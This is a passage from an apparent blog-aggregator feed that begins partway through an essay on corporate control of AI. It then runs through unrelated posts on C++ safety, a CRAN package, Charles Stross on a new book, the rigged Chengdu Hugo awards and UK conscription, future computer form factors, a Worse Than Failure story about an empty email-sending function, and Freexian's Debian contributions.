In the absence of a public option, consumers should look warily to two recent markets that have been consolidated by tech venture capital. In each case, after the victorious firms established their dominant positions, the result was exploitation of their userbases and debasement of their products. One is online search and social media, where the dominant rise of Facebook and Google atop a free-to-use, ad supported model demonstrated that, when you’re not paying, you are the product. The result has been a widespread erosion of online privacy and, for democracy, a corrosion of the information market on which the consent of the governed relies. The other is ridesharing, where a decade of VC-funded subsidies behind Uber and Lyft squeezed out the competition until they could raise prices.

The need for competent and faithful administration is not unique to AI, and it is not a problem we can look to AI to solve. Serious policymakers from both sides of the aisle should recognize the imperative for public-interested leaders not to abdicate control of the future of AI to corporate titans. We do not need to reinvent our democracy for AI, but we do need to renovate and reinvigorate it to offer an effective alternative to untrammeled corporate control that could erode our democracy.

365 TomorrowsA Time and Place for Things

Author: Soramimi Hanarejima When the Bureau of Introspection discovered how to photograph the landscapes within us, we were all impressed that this terrain, which had only been visible in dreams, could be captured and viewed by anyone. This struck us as a huge leap, but toward what, we couldn’t say. We thought seeing our own […]

The post A Time and Place for Things appeared first on 365tomorrows.

Cryptogram Improving C++

C++ guru Herb Sutter writes about how we can improve the programming language for better security.

The immediate problem “is” that it’s Too Easy By Default™ to write security and safety vulnerabilities in C++ that would have been caught by stricter enforcement of known rules for type, bounds, initialization, and lifetime language safety.

His conclusion:

We need to improve software security and software safety across the industry, especially by improving programming language safety in C and C++, and in C++ a 98% improvement in the four most common problem areas is achievable in the medium term. But if we focus on programming language safety alone, we may find ourselves fighting yesterday’s war and missing larger past and future security dangers that affect software written in any language.

Planet DebianDirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release.

For example, when I do this right now as I type this, I see

which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do I from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of ‘can I haz networking?’ to speed things up. The check adds another 200ms or so.)

The function (and the wrapper) offer a ton of options too this is ridiculously easy to do thanks to the docopt package:

The README at the git repo and the CRAN page offer a ‘screenshot movie’ showing some of the options in action.

I have been using the little tools quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that again a big Thank You! of appcreciation for all that CRAN does—which this week included letting this past the newbies desk in under 24 hours.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Charles StrossA message from our sponsors: New Book coming!

(You probably expected this announcement a while ago ...)

I've just signed a new two book deal with my publishers, Tor.com publishing in the USA/Canada and Orbit in the UK/rest of world, and the book I'm talking about here and now—the one that's already written and delivered to the Production people who turn it into a thing you'll be able to buy later this year—is a Laundry stand-alone titled "A Conventional Boy".

("Delivered to production" means it is now ready to be copy-edited, typeset, printed/bound/distributed and simultaneously turned into an ebook and pushed through the interwebbytubes to the likes of Kobo and Kindle. I do not have a publication date or a link where you can order it yet: it almost certainly can't show up before July at this point. Yes, everything is running late. No, I have no idea why.)

"A Conventional Boy" is not part of the main (and unfinished) Laundry Files story arc. Nor is it a New Management story. It's a stand-alone story about Derek the DM, set some time between the end of "The Fuller Memorandum" and before "The Delirium Brief". We met Derek originally in "The Nightmare Stacks", and again in "The Labyrinth Index": he's a portly, short-sighted, middle-aged nerd from the Laundry's Forecasting Ops department who also just happens to be the most powerful precognitive the Laundry has tripped over in the past few decades—and a role playing gamer.

When Derek was 14 years old and running a D&D campaign, a schoolteacher overheard him explaining D&D demons to his players and called a government tips hotline. Thirty-odd years later Derek has lived most of his life in Camp Sunshine, the Laundry's magical Gitmo for Elder God cultists. As a trusty/"safe" inmate, he produces the camp newsletter and uses his postal privileges to run a play-by-mail RPG. One day, two pieces of news cross Derek's desk: the camp is going to be closed down and rebuilt as a real prison, and a games convention is coming to the nearest town.

Camp Sunshine is officially escape-proof, but Derek has had a foolproof escape plan socked away for the past decade. He hasn't used it because until now he's never had anywhere to escape to. But now he's facing the demolition of his only home, and he has a destination in mind. Come hell or high water, Derek intends to go to his first ever convention. Little does he realize that hell is also going to the convention ...

I began writing "A Conventional Boy" in 2009, thinking it'd make a nice short story. It went on hold for far too long (it was originally meant to come out before "The Nightmare Stacks"!) but instead it lingered ... then when I got back to work on it, the story ran away and grew into a short novel in its own right. As it's rather shorter than the other Laundry novels (although twice as long as, say, "Equoid") the book also includes "Overtime" and "Escape from Yokai Land", both Laundry Files novelettes about Bob, and an afterword providing some background on the 1980s Satanic D&D Panic for readers who don't remember it (which sadly means anyone much younger than myself).

Questions? Ask me anything!

Charles StrossWorldcon in the news

You've probably seen news reports that the Hugo awards handed out last year at the world science fiction convention in Chengdu were rigged. For example: Science fiction awards held in China under fire for excluding authors.

The Guardian got bits of the background wrong, but what's undeniably true is that it's a huge mess. And the key point the press and most of the public miss is that they seem to think there's some sort of worldcon organization that can fix this.

Spoiler: there isn't.

(Caveat: what follows below the cut line is my brain dump, from 20km up, in lay terms, of what went wrong. I am not a convention runner and I haven't been following the Chengdu mess obsessively. If you want the inside baseball deets, read the File770 blog. If you want to see the rulebook, you can find it here (along with a bunch more stuff). I am on the outside of the fannish discourse and flame wars on this topic, and I may have misunderstood some of the details. I'm open to authoritative corrections and will update if necessary.)

SF conventions are generally fan-run (amateur) get-togethers, run on a non-profit/volunteer basis. There are some exceptions (the big Comiccons like SDCC, a couple of really large fan conventions that out-grew the scale volunteers can run them on so pay full-time staff) but generally they're very amateurish.

SF conventions arose organically out of SF fan clubs that began holding face to face meet-ups in the 1930s. Many of them are still run by local fan clubs and usually they stick to the same venue for decades: for example, the long-running Boskone series of conventions in Boston is run by NESFA, the New England SF Association; Novacon in the UK is run by the Birmingham SF Group. Both have been going for over 50 years now.

Others are less location-based. In the UK, there are the British Eastercons held over the easter (long) bank holiday weekend every year in a different city. It's a notionally national SF convention, although historically it's tended to be London-centric. They're loosely associated with the BSFA, which announces it's own SF awards (the BSFA awards) at the eastercon.

Because it's hard to run a convention when you live 500km from the venue, local SF societies or organizer teams talk to hotels and put together a bid for the privilege of working their butts off for a weekend. Then, a couple of years before the convention, there's a meeting and a vote at the preceding-but-one con in the series where the members vote on where to hold that year's convention.

Running a convention is not expense-free, so it's normal to charge for membership. (Nobody gets paid, but conventions host guests of honour—SF writers, actors, and so on—and they get their membership, hotel room, and travel expenses comped in the expectation that they'll stick around and give talks/sign books/shake hands with the members.)

What's less well-known outside the bubble is that it's also normal to offer "pre-supporting" memberships (to fund a bid) and "supporting" memberships (you can't make it to the convention that won the bidding war but you want to make a donation). Note that such partial memberships are upgradable later for the difference in cost if you decide to attend the event.

The world science fiction convention is the name of a long-running series of conventions (the 82nd one is in Glasgow this August) that are held annually. There is a rule book for running a worldcon. For starters, the venue is decided by a bidding war between sites (as above). For seconds, members of the convention are notionally buying membership, for one year, in the World Science Fiction Society (WSFS). The rule book for running a worldcon is the WSFS constitution, and it lays down the rules for:

  • Voting on where the next-but-one worldcon will be held ("site selection")
  • Holding a business meeting where motions to amend the WSFS constitution can be discussed and voted on (NB: to be carried a motion must be proposed and voted through at two consecutive worldcons)
  • Running the Hugo awards

The important thing to note is that the "worldcon" is *not a permanent organization. It's more like a virus that latches onto an SF convention, infects it with worldcon-itis, runs the Hugo awards and the WSFS business meeting, then selects a new convention to parasitize the year after next.

No worldcon binds the hands of the next worldcon, it just passes the baton over in the expectation that the next baton-holder will continue the process rather than, say, selling the baton off to be turned into matchsticks.

This process worked more or less fine for eighty years, until it ran into Chengdu.

Worldcons are volunteer, fan-organized, amateur conventions. They're pretty big: the largest hit roughly 14,000 members, and they average 4000-8000. (I know of folks who used "worked on a British eastercon committee" as their dissertation topic for degrees in Hospitality Management; you don't get to run a worldcon committee until you're way past that point.) But SF fandom is a growing community thing in China. And even a small regional SF convention in China is quite gigantic by most western (trivially, US/UK) standards.

My understanding is that a bunch of Chinese fans who ran a successful regional convention in Chengdu (population 21 million; slightly more than the New York metropolitan area, about 30% more than London and suburbs) heard about the worldcon and thought "wouldn't it be great if we could call ourselves the world science fiction convention?"

They put together a bid, then got a bunch of their regulars to cough up $50 each to buy a supporting membership in the 2021 worldcon and vote in site selection. It doesn't take that many people to "buy" a worldcon—I seem to recall it's on the order of 500-700 votes—so they bought themselves the right to run the worldcon in 2023. And that's when the fun and games started.

See, Chinese fandom is relatively isolated from western fandom. And the convention committee didn't realize that there was this thing called the WSFS Constitution which set out rules for stuff they had to do. I gather they didn't even realize they were responsible for organizing the nomination and voting process for the Hugo awards, commissioning the award design, and organizing an awards ceremony, until about 12 months before the convention (which is short notice for two rounds of voting. commissioning a competition between artists to design the Hugo award base for that year, and so on). So everything ran months too late, and they had to delay the convention, and most of the students who'd pitched in to buy those bids could no longer attend because of bad timing, and worse ... they began picking up an international buzz, which in turn drew the attention of the local Communist Party, in the middle of the authoritarian clamp-down that's been intensifying for the past couple of years. (Remember, it takes a decade to organize a successful worldcon from initial team-building to running the event. And who imagined our existing world of 2023 back in 2013?)

The organizers appear to have panicked.

First they arbitrarily disqualified a couple of very popular works by authors who they thought might offend the Party if they won and turned up to give an acceptance speech (including "Babel", by R. F. Kuang, which won the Nebula and Locus awards in 2023 and was a favourite to win the Hugo as well).

Then they dragged their heels on releasing the vote counts—the WSFS Constitution requires the raw figures to be released after the awards are handed out.

Then there were discrepancies in the count of votes cast, such that the raw numbers didn't add up.

The haphazard way they released the data suggests that the 911 call is coming from inside the house: the convention committee freaked out when they realized the convention had become a political hot potato, rigged the vote badly, and are now farting smoke signals as if to say "a secret policeman hinted that it could be very unfortunate if we didn't anticipate the Party's wishes".

My take-away:

The world science fiction convention coevolved with fan-run volunteer conventions in societies where there's a general expectation of the rule of law and most people abide by social norms irrespective of enforcement. The WSFS constitution isn't enforceable except insofar as normally fans see no reason not to abide by the rules. So it works okay in the USA, the UK, Canada, the Netherlands, Japan, Australia, New Zealand, and all the other western-style democracies it's been held in ... but broke badly when a group of enthusiasts living in an authoritarian state won the bid then realized too late that by doing so they'd come to the attention of Very Important People who didn't care about their society's rulebook.

Immediate consequences:

For the first fifty or so worldcons, worldcon was exclusively a North American phenomenon except for occasional sorties to the UK. Then it began to open up as cheap air travel became a thing. In the 21st century about 50% of worldcons are held outside North America, and until 2016 there was an expectation that it would become truly international.

But the Chengdu fubar has created shockwaves. There's no immediate way to fix this, any more than you'll be able to fix Donald Trump declaring himself dictator-for-life on the Ides of March in 2025 if he gets back into the White House with a majority in the House and Senate. It needs a WSFS constitutional amendment at least (so pay attention to the motions and voting in Glasgow, and then next year, in Seattle) just to stop it happening again. And nobody has ever tried to retroactively invalidate the Hugo awards. While there's a mechanism for running Hugo voting and handing out awards for a year in which there was no worldcon (the Retrospective Hugo awards—for example, the 1945 Hugo Awards were voted on in 2020—nobody considered the need to re-run the Hugos for a year in which the vote was rigged. So there's no mechanism.

The fallout from Chengdu has probably sunk several other future worldcon bids—and it's not as if there are a lot of teams competing for the privilege of working themselves to death: Glasgow and Seattle (2024 and 2025) both won their bidding by default because they had experienced, existing worldcon teams and nobody else could be bothered turning up. So the Ugandan worldcon bid has collapsed (and good riddance, many fans would vote NO WORLDCON in preference to a worldcon in a nation that recently passed a law making homosexuality a capital offense). The Saudi Arabian bid also withered on the vine, but took longer to finally die. They shifted their venue to Cairo in a desperate attempt to overcome Prince Bone-saw's negative PR optics, but it hit the buffers when the Egyptian authorities refused to give them the necessary permits. Then there's the Tel Aviv bid. Tel Aviv fans are lovely people, but I can't see an Israeli worldcon being possible in the foreseeable future (too many genocide cooties right now). Don't ask about Kiev (before February 2022 they were considering bidding for the Eurocon). And in the USA, the prognosis for successful Texas and Florida worldcon bids are poor (book banning does not go down well with SF fans).

Beyond Seattle in 2025, the sole bid standing for 2026 (now the Saudi bid has died) is Los Angeles. Tel Aviv is still bidding for 2027, but fat chance: Uganda is/was targeting 2028, and there was some talk of a Texas bid in 2029 (all these are speculative bids and highly unlikely to happen in my opinion). I am also aware of a bid for a second Dublin worldcon (they've got a shiny new conference centre), targeting 2029 or 2030. There may be another Glasgow or London bid in the mid-30s, too. But other than that? I'm too out of touch with current worldcon politics to say, other than, watch this space (but don't buy the popcorn from the concession stand, it's burned and bitter).

UPDATE

A commenter just drew my attention to this news item on China.org.cn, dated October 23rd, 2023, right after the worldcon. It begins:

Investment deals valued at approximately $1.09 billion were signed during the 81st World Science Fiction Convention (Worldcon) held in Chengdu, Sichuan province, last week at its inaugural industrial development summit, marking significant progress in the advancement of sci-fi development in China.

The deals included 21 sci-fi industry projects involving companies that produce films, parks, and immersive sci-fi experiences ..."

That's a metric fuckton of moolah in play, and it would totally account for the fan-run convention folks being discreetly elbowed out of the way and the entire event being stage-managed as a backdrop for a major industrial event to bootstrap creative industries (film, TV, and games) in Chengdu. And—looking for the most charitable interpretation here—the hapless western WSFS people being carried along for the ride to provide a veneer of worldcon-ness to what was basically Chinese venture capital hijacking the event and then sanitizing it politically.

Follow the money.

Planet DebianRussell Coker: The Shape of Computers

Introduction

There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.

This means that further development in the size and shape of computers will largely be determined by human factors.

I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.

Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.

Desktop/Laptop PCs

When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.

The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.

The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].

The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.

I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.

We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.

The Interesting New Things

Watch Like

The wrist-watch [4] has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.

The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?

Phone Like

Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.

Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.

Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.

The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.

Laptop Like

One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.

The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.

Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.

Useful Hardware for Developing These Things

I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.

The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.

The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.

Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.

What We Must Do

Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.

To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.

Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.

ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.

Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.

I will write more posts about these thing.

Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Worse Than FailureCheck Your Email

Branon's boss, Steve, came storming into his cube. From the look of panic on his face, it was clear that this was a full hair-on-fire emergency.

"Did we change anything this weekend?"

"No," Branon said. "We never deploy on a weekend."

"Well, something must have changed?!"

After a few rounds of this, Steve's panic wore off and he explained a bit more clearly. Every night, their application was supposed to generate a set of nightly reports and emailed them out. These reports went to a number of people in the company, up to and including the CEO. Come Monday morning, the CEO checked his inbox and horror of horror- there was no report!

"And going back through people's inboxes, this seems like it's been a problem for months- nobody seems to have received one for months."

"Why are they just noticing now?" Branon asked.

"That's really not the problem here. Can you investigate why the emails aren't going out?"

Branon put aside his concerns, and agreed to dig through and debug the problem. Given that it involved sending emails, Branon was ready to spend a long time trying to debug whatever was going wrong in the chain. Instead, finding the problem only took about two minutes, and most of that was spent getting coffee.

public void Send()
{
    //TODO: send email here
}

This application had been in production over a year. This function had not been modified in that time. So while it's technically true that no one had received a report "for months" (16 months is a number of months), it would probably have been more accurate to say that they had never received a report. Now, given that it had been over a year, you'd think that maybe this report wasn't that important, but now that the CEO had noticed, it was the most important thing at the company. Work on everything else stopped until this was done- mind you, it only took one person a few hours to implement and test the feature, but still- work on everything else stopped.

A few weeks later a new ticket was opened: people felt that the nightly reports were too frequent, and wanted to instead just go to the site to pull the report, which is what they had been doing for the past 16 months.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsAlways in Line

Author: Frederick Charles Melancon The scars don’t glow like they once did, yet around my pants’ cuffs, neon-green halos still light my ankles. Mom used to love halos—hanging glass circles around the house to create them. But these marks from the bombing blasts on Mars shine so bright that they still keep me up at […]

The post Always in Line appeared first on 365tomorrows.

xkcdEarth

Planet DebianFreexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne

Much of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rincón

Last month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work.

Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!

The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.

Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI’s CI.

Packaging simplemonitor, by Carles Pina i Estany

Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.

During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.

Carles also started upgrading or improving some of simplemonitor’s dependencies.

Miscellaneous contributions

  • Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
  • Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
  • DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
  • Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
  • A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
  • Enrico participated in /usr-merge discussions with Helmut.
  • Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
  • Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
  • Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
  • Helmut send patches for 48 cross build failures.
  • Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
  • Helmut sent a debci MR for improving collector robustness.
  • In preparation for DebConf 25, Santiago worked on the Brest Bid.

,

Charles StrossSame bullshit, new tin

I am seeing newspaper headlines today along the lines of British public will be called up to fight if UK goes to war because 'military is too small', Army chief warns, and I am rolling my eyes.

The Tories run this flag up the mast regularly whenever they want to boost their popularity with the geriatric demographic who remember national service (abolished 60 years ago, in 1963). Thatcher did it in the early 80s; the Army general staff told her to piss off. And the pols have gotten the same reaction ever since. This time the call is coming from inside the house—it's a general, not a politician—but it still won't work because changes to the structure of the British society and economy since 1979 (hint: Thatcher's revolution) make it impossible.

Reasons it won't work: there are two aspects, infrastructure and labour.

Let's look at infrastructure first: if you have conscripts, it follows that you need to provide uniforms, food, and beds for them. Less obviously, you need NCOs to shout at them and teach them to brush their teeth and tie their bootlaces (because a certain proportion of your intake will have missed out on the basics). The barracks that used to be used for a large conscript army were all demolished or sold off decades ago, we don't have half a million spare army uniforms sitting in a warehouse somewhere, and the army doesn't currently have ten thousand or more spare training sergeants sitting idle.

Russia could get away with this shit when they invaded Ukraine because Russia kept national service, so the call-up mostly got adults who had been through the (highly abusive) draft some time in the preceding years. Even so, they had huge problems with conscripts sleeping rough or being sent to the front with no kit.

The UK is in a much worse place where it comes to conscription: first you have to train the NCOs (which takes a couple of years as you need to start with experienced and reasonably competent soldiers) and build the barracks. Because the old barracks? Have mostly been turned into modern private housing estates, and the RAF airfields are now civilian airports (but mostly housing estates) and that's a huge amount of construction to squeeze out of a British construction industry that mostly does skyscrapers and supermarkets these days.

And this is before we consider that we're handing these people guns (that we don't have, because there is no national stockpile of half a million spare SA-80s and the bullets to feed them, never mind spare operational Challenger-IIs) and training them to shoot. Rifles? No problem, that'll be a few weeks and a few hundred rounds of ammunition per soldier until they're competent to not blow their own foot off. But anything actually useful on the battlefield, like artillery or tanks or ATGMs? Never mind the two-way radio kit troops are expected to keep charged and dry and operate, and the protocol for using it? That stuff takes months, years, to acquire competence with. And firing off a lot of training rounds and putting a lot of kilometres on those tank tracks (tanks are exotic short-range vehicles that require maintenance like a Bugatti, not a family car). So the warm conscript bodies are just the start of it—bringing back conscription implies equipping them, so should be seen as a coded gimme for "please can has 500% budget increase" from the army.

Now let's discuss labour.

A side-effect of conscription is that it sucks able-bodied young adults out of the workforce. The UK is currently going through a massive labour supply crunch, partly because of Brexit but also because a chunk of the work force is disabled due to long COVID. A body in a uniform is not stacking shelves in Tesco or trading shares in the stock exchange. A body in uniform is a drain on the economy, not a boost.

